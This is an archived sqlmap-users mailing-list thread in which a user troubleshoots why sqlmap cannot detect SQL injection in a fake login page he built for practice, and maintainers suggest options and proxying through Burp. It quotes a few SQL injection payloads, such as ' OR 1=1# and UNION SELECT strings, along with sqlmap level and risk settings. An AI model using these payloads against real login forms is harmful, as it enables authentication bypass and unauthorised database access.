>>>>> Check out the vibrant tech community on one of the world's most
>>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>>> http://sdm.link/slashdot
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>> ------------------------------------------------------------
>>>> ------------------
>>>> Check out the vibrant tech community on one of the world's most
>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>> http://sdm.link/slashdot_______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>>
>>>
>>
>> ------------------------------------------------------------
>> ------------------
>> Check out the vibrant tech community on one of the world's most
>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>

Re: [sqlmap-users] Problem with a Login

[Miroslav S. <mir...@gm...>]

I am kind of confused. You said that it's your application, right? Why
would your application care about UA. Also, you've sent source code which
hasn't looked into UA

Bye

On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:

> Ok, i made a test with BurpSuite as Brandon said.
> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
> The same payload with sqlmap not.
>
> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>
> the first is made manually with firefox the second with sqlmap...
> should i change user-agent in sqlmap?
>
> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>
>> Ok, i made a test with BurpSuite as Brandon said.
>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>> The same payload with sqlmap not.
>>
>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>
>> the first is made manually with firefox the second with sqlmap...
>> should i change user-agent in sqlmap?
>>
>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>
>>> You can add —proxy and make sqlmap pass all requests through burpsuite
>>> or another proxy so you can see what the difference is between the requests
>>> sqlmap creates and the ones you make by hand are.
>>>
>>>
>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...>
>>> wrote:
>>>
>>> This is a straigthforward case. You are messing something up.
>>>
>>> Use username=foobar&password=foobar in POST data. Don't put already
>>> SQLi payload anywhere. Use --level=3 --risk=3
>>>
>>> As said, you are doing something really really wrong here.
>>>
>>> Bye
>>>
>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...>
>>> wrote:
>>>
>>>> Hi!
>>>> I have an issue with sqlmap.
>>>> I created my own fake login in order to test blind sql injection but
>>>> everytime i make a test sqlmap says it isn't exploitable.
>>>> I tried to add a suffix, set level to 5, set risk to 3, set not-string
>>>> option but sqlmap still not work with it.
>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>
>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL
>>>> SELECT NULL;NULL #, etc... and they work.
>>>> What should i do?
>>>>
>>>> Thanks in advance!
>>>>
>>>>
>>>> Daniele.
>>>>
>>>> ------------------------------------------------------------
>>>> ------------------
>>>> Check out the vibrant tech community on one of the world's most
>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>> http://sdm.link/slashdot
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>> ------------------------------------------------------------
>>> ------------------
>>> Check out the vibrant tech community on one of the world's most
>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>> http://sdm.link/slashdot_______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>>
>>
>
> ------------------------------------------------------------
> ------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] Problem with a Login

[Daniele B. <bbi...@gm...>]

Ok, i made a test with BurpSuite as Brandon said.
I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
The same payload with sqlmap not.

This is what BurpSuite shows: http://pastebin.com/6ifKNX9k

the first is made manually with firefox the second with sqlmap...
should i change user-agent in sqlmap?

2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:

> Ok, i made a test with BurpSuite as Brandon said.
> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
> The same payload with sqlmap not.
>
> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>
> the first is made manually with firefox the second with sqlmap...
> should i change user-agent in sqlmap?
>
> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>
>> You can add —proxy and make sqlmap pass all requests through burpsuite or
>> another proxy so you can see what the difference is between the requests
>> sqlmap creates and the ones you make by hand are.
>>
>>
>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...>
>> wrote:
>>
>> This is a straigthforward case. You are messing something up.
>>
>> Use username=foobar&password=foobar in POST data. Don't put already SQLi
>> payload anywhere. Use --level=3 --risk=3
>>
>> As said, you are doing something really really wrong here.
>>
>> Bye
>>
>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...>
>> wrote:
>>
>>> Hi!
>>> I have an issue with sqlmap.
>>> I created my own fake login in order to test blind sql injection but
>>> everytime i make a test sqlmap says it isn't exploitable.
>>> I tried to add a suffix, set level to 5, set risk to 3, set not-string
>>> option but sqlmap still not work with it.
>>> The login source is: http://pastebin.com/xzKZJNB1
>>>
>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL
>>> SELECT NULL;NULL #, etc... and they work.
>>> What should i do?
>>>
>>> Thanks in advance!
>>>
>>>
>>> Daniele.
>>>
>>> ------------------------------------------------------------
>>> ------------------
>>> Check out the vibrant tech community on one of the world's most
>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>> http://sdm.link/slashdot
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>> ------------------------------------------------------------
>> ------------------
>> Check out the vibrant tech community on one of the world's most
>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>> http://sdm.link/slashdot_______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>

Re: [sqlmap-users] Problem with a Login

[Brandon P. <bpe...@gm...>]

You can add —proxy and make sqlmap pass all requests through burpsuite or another proxy so you can see what the difference is between the requests sqlmap creates and the ones you make by hand are.


> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...> wrote:
> 
> This is a straigthforward case. You are messing something up.
> 
> Use username=foobar&password=foobar in POST data. Don't put already SQLi payload anywhere. Use --level=3 --risk=3
> 
> As said, you are doing something really really wrong here.
> 
> Bye
> 
> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm... <mailto:bbi...@gm...>> wrote:
> Hi!
> I have an issue with sqlmap.
> I created my own fake login in order to test blind sql injection but everytime i make a test sqlmap says it isn't exploitable.
> I tried to add a suffix, set level to 5, set risk to 3, set not-string option but sqlmap still not work with it.
> The login source is: http://pastebin.com/xzKZJNB1 <http://pastebin.com/xzKZJNB1>
> 
> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.
> What should i do?
> 
> Thanks in advance!
> 
> 
> Daniele.
> 
> ------------------------------------------------------------------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, SlashDot.org! http://sdm.link/slashdot <http://sdm.link/slashdot>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li... <mailto:sql...@li...>
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users <https://lists.sourceforge.net/lists/listinfo/sqlmap-users>
> 
> 
> 
> 
> --
> Miroslav Stampar
> http://about.me/stamparm <http://about.me/stamparm>------------------------------------------------------------------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, SlashDot.org! http://sdm.link/slashdot_______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] Problem with a Login

[Miroslav S. <mir...@gm...>]

This is a straigthforward case. You are messing something up.

Use username=foobar&password=foobar in POST data. Don't put already SQLi
payload anywhere. Use --level=3 --risk=3

As said, you are doing something really really wrong here.

Bye

On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...>
wrote:

> Hi!
> I have an issue with sqlmap.
> I created my own fake login in order to test blind sql injection but
> everytime i make a test sqlmap says it isn't exploitable.
> I tried to add a suffix, set level to 5, set risk to 3, set not-string
> option but sqlmap still not work with it.
> The login source is: http://pastebin.com/xzKZJNB1
>
> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL
> SELECT NULL;NULL #, etc... and they work.
> What should i do?
>
> Thanks in advance!
>
>
> Daniele.
>
> ------------------------------------------------------------
> ------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm